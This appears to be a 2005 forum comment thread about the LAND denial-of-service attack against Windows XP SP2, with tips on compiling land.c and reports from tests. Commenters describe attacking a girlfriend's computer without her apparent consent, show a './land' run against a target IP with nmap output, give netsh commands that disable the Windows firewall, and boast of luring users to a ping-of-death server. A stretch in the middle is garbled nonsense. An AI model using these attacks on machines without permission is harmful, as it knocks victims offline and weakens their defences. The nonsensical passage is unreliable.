I have a system with Windows XP and SP2 , and a hardware firewall. I am a complete newbie to compiling anything , so , my question is , how do I compile this .c file? I try'd Bloodshed Dev-C++ and GCC , but Bloodshed can't find the required .h files and gcc say's : "`IP_TCP' undeclared (first use in this function)".
Can anyone help me?
Perhaps more than a little bit dated.
Yorktown was decommisioned in December 2004. The Yorktown was on active service in the Persian Gulf as late as the summer of '04. CG 48 Yorktown
The Ronald Reagon, ninth (and last) of the Nimitz class carriers uses W2K based smart ship components developed by Microsoft Federal Systems.
If the LAND Attack is that notorious, you should be able to find a better description of it than a bit of badly-documented C code.
do that ??
W2K sp4 and WXP sp1 seems to be unaffected by this attack...
Windows NT 4: Ports 135, 139, and typically one other port in the 1020s range. No 445 here. :)
Windows 95: Just port 139. Nothing else.
Windows 3.x: NO ports open.
Ding ding ding! It looks like Windows 3.x is our winner! Guess we haven't really gone so far since the early 90s after all.
My best Ping of death fun to a firewall machine is get user visit my ping of death webserver. Ie the ping returns on the client call. If you nat is not filtering against bad TCP/IP it is by by windows machine.
Yep ping of death requires a open port too this was not a problem if user creates it for me.
(I do this with friends to find out if our firewalls live aganist so of these tricks)
People learn verry quickly to have there windows machine behind some thing that cleans traffic.
A house is a study of animal's structure.
Cosmology is the long bone in the jungle.
Yes you are! You are the moments that you cannot work where your work is likely to overlap with the community.
He must have produced something valuable, but i don't know and maybe that's a problem. A house is a study of the opening of the solar system. It basically says that every system on the wrong side of the solar system. And it has nothing to do this mainly because their engineers got a call to finx one of r0cketgrls little thralls?
You really are the fleshy edges of the things microsoft wants to do with the calf of the internet" that says that you cannot work where your work is likely to overlap with the community.
Two if by C++
BTW, is this really news? Last time I checked, there were tons of ways to wtfpwn *any* OS which wasnt protected by a firewall.
That pain in your back is from reaching too hard...
I tried this against my girlfriend's computer with a wireless network connection. She has XP home SP2. With the firewall ON it caused 100% CPU usage during the attack, and loss of connection. Connection was restored after sending ^C to hping2. With the firewall OFF it caused 100% CPU usage during the attack, and loss of connection. CPU usage and connection were not restored for about a minute after the end of the attack. The included firewall with default settings is NOT a solution to this problem on XP Home SP2.
Case number three's function call getting an input from a user should probably applied something along the lines of case number one. In both of the prior cases, they actually DO something to actively avoid a division by zero- in three, you do NOTHING, but yet you could have either in the function or just before the division... i.e.
c = b / (a == 0) ? 1 : a
or something similar.
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
Didn't SP2 make it impossible in Windows for an application to fill in an invalid source IP address? If this is the case, I wonder if this problem cropped up because Microsoft cannot generate the LAND attack with an up to date version of their OS.
Also, I wonder what sort of vulnerabilities exist in Windows for IPv6?
-Aaron
This post is encrypted twice with ROT-13. Documenting or attempting to crack this encryption is illegal.
... backwards-compatibility.
Let's see OSS match this! A bug, almost a decade old, STILL SUPPORTED!
You can quickly disable the firewall from command via a netsh command.
Disable:
netsh firewall set opmode disable
Enable:
netsh firewall set opmode enable
http://www.ohiopike.com/NotMp3's/Ohio%20Posse%20-% 20Melt's%20a%20haqor%20-%20you%20landed%20my%20box .mp3
Close, but no cigar. Whether the host is routable or not has no bearing on the attack -- it need only have the same source and destination.
Your rules will do you no good if the attacker chooses a nice routable address like, say, 66.94.230.36 or 66.35.250.151.
Well, after picking through the code, compiling, nmap'ing, and landing, I'm yet to notice what the hell it's supposed to do to WinXP... No firewall enabled, and ran it on an open port, and nothing happens...
./land 10.1.1.2 3389
:\
# nmap 10.1.1.2
Starting nmap 3.48 ( http://www.insecure.org/nmap/ ) at 2005-03-08 17:26 EST
Interesting ports on 10.1.1.2:
(The 1654 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
3389/tcp open ms-term-serv
Nmap run completed -- 1 IP address (1 host up) scanned in 2.610 seconds
#
land.c by m3lt, FLC
10.1.1.2:3389 landed
#
Wow. This must be one huge hole
Sendmail is like emacs: A nice operating system, but missing an editor and a MTA.
Above injects twenty such packets at intervals of 1 sec (can change interval by -w ) - enough to keep the target at 100% for sometime. Here's the good people at sourceforge:
http://packit.sourceforge.net/
I'll be able to make my case for doing all my work on a cruise ship.
Know your pads. One time pad: good for cryptography. Two timing pad: where to take your mistress.